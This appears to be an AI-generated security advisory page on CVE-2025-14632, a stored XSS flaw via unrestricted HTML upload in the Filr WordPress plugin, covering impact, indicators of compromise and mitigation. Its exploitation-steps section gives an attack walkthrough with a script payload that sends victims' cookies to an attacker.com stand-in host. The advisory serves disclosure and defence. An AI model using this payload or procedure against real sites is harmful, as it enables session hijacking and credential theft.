CVE-2025-14632: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-14632 is a Stored Cross-Site Scripting (XSS) vulnerability in the Filr – Secure document library plugin for WordPress, caused by unrestricted file upload in the FILR_Uploader class. All versions up to and including 1.2.11 are affected. The vulnerability was disclosed on January 16–17, 2026, with Wordfence as the reporting CNA. It carries a CVSS v3.1 base score of 4.4 (Medium) (Wordfence, NVD).

Technical details

The root cause is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). The FILR_Uploader class in the plugin fails to enforce adequate file type restrictions, allowing authenticated users with Administrator-level access to upload malicious HTML files containing embedded JavaScript. When any user with appropriate permissions accesses the uploaded file (via a post of the filr post type), the JavaScript executes in their browser context, constituting a stored XSS attack. The vulnerable code is visible in the plugin's source at class-filr-uploader.php line 14 (WordPress Trac, Wordfence).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who access the maliciously uploaded file, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. The scope is marked as Changed, meaning the impact extends beyond the vulnerable component itself. Confidentiality and integrity are both assessed as Low impact, with no availability impact; however, chained with other vulnerabilities or in multi-tenant environments, the risk could be elevated (Wordfence).

Exploitability

Exploitation requires authenticated access at the Administrator level or above, significantly limiting the attack surface. The EPSS score is approximately 0.027%, indicating a very low probability of widespread exploitation in the near term. No evidence of in-the-wild exploitation, active exploit kits, or threat actor attribution has been reported. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, NVD).

Exploitation steps

  1. Authenticate as Administrator: Log in to the target WordPress site with an account that has Administrator-level privileges or higher, and permission to create or edit posts with the filr post type.
  2. Prepare malicious HTML file: Craft an HTML file containing a JavaScript payload, for example: <script>document.location='https://attacker.com/steal?c='+document.cookie;</script>.
  3. Upload via Filr plugin: Navigate to the Filr plugin's file upload interface and upload the crafted HTML file. Due to insufficient file type restrictions in FILR_Uploader, the upload succeeds without rejection.
  4. Share or link the file: Create or edit a filr post type entry that references the uploaded HTML file, making it accessible to target users.
  5. Trigger execution: When a victim user accesses the uploaded file through the WordPress site, their browser renders the HTML and executes the embedded JavaScript, completing the stored XSS attack (Wordfence, WordPress Trac).

Indicators of compromise

  • File System: Presence of .html files with embedded <script> tags in the WordPress uploads directory associated with the Filr plugin (e.g., wp-content/uploads/filr/ or similar).
  • Logs: WordPress access logs showing POST requests to the Filr file upload endpoint followed by GET requests to the uploaded .html file from different user sessions.
  • Network: Outbound requests from victim browsers to unexpected external domains shortly after accessing Filr-hosted files, potentially carrying cookie or session data in query parameters.
  • Application: Unexpected .html file types appearing in the Filr document library that are not consistent with normal document types (PDF, DOCX, etc.).

Mitigation and workarounds

Users should update the Filr – Secure document library plugin to a version beyond 1.2.11 that includes the fix for file type restrictions. The patch is reflected in the plugin's trunk repository changeset (WordPress Changeset). As a temporary workaround, restrict Administrator-level access to trusted users only and audit existing uploaded files in the Filr library for suspicious HTML content. Site owners should also consider implementing a Web Application Firewall (WAF) rule to block HTML file uploads to the plugin's upload endpoint (Wordfence).

Community reactions

The vulnerability was reported and disclosed by Wordfence, a leading WordPress security firm, as part of their threat intelligence program. No significant broader media coverage or notable researcher commentary beyond the initial Wordfence advisory has been identified. The CVE record is noted as not being prioritized for NVD enrichment due to resource constraints (NVD).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management